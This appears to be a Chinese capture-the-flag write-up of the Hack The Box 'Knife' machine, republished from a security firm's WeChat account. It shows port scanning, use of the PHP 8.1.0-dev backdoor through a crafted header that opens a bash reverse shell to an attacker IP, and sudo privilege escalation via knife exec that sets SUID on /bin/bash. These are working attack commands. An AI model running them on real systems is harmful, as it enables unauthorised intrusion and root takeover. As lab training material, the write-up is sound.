Hack The Box-knife

admin 2022年6月30日23:49:14安全文章评论3 views1285字阅读4分17秒阅读模式

0x01 靶场描述

    Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场,官网:https://www.hackthebox.eu/invite。knife特性如图:

Hack The Box-knife

0x02 靶场复现

知识点: 端口、漏洞扫描、PHP 8.1.0-dev 版本在2021年3月28日被植入后门、sudo提权


一、端口、漏洞扫描,发现存在PHP8.1.0-dev后门

1.使用nmap扫描,发现该目标开启了22和80端口

nmap -sC -sV 10.10.10.242 #-sC调用脚本 -sV识别系统版本

Hack The Box-knife


2.nikto扫描该网站,发现存在x-powered-by header: PHP/8.1.0-dev参数,该参数在是由于PHP 8.1.0-dev 版本在2021年3月28日被植入后门

添加User-Agentt头执行反弹shell命令:User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.3/7777 0>&1'");

Hack The Box-knife


3.成功获取到一个用户名为james的shell

Hack The Box-knife

4.查找python3并调试命令行交互

which python3python3 -c 'import pty; pty.spawn("/bin/bash")'

Hack The Box-knife


二、sudo提权


1.sudo -l发现本用户可以nopass通过root权限执行/usr/bin/knife这个文件

sudo -l

Hack The Box-knife


2.进行提权

1.切换到~目录cd ~
2.编写脚本,该脚本意思是通过某用户某文件执行root的/bin/bashecho "system('chmod +s /bin/bash')" > exploit.rb
3.通过本用户sudo /usr/bin/knife执行root的/bin/bashsudo /usr/bin/knife exec exploit.rb
4.查看/bin/bash权限,发现普通管理员均可执行ls -al /bin/bash
5.执行/bin/bash获得root权限/bin/bash -p
6.查看flagcat root.txt #03097c1de2493c1bbcdd37816d2e0b69

Hack The Box-knife

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)


0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog



原文始发于微信公众号(融云攻防实验室):Hack The Box-knife

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月30日23:49:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Hack The Box-knife http://cn-sec.com/archives/1134806.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: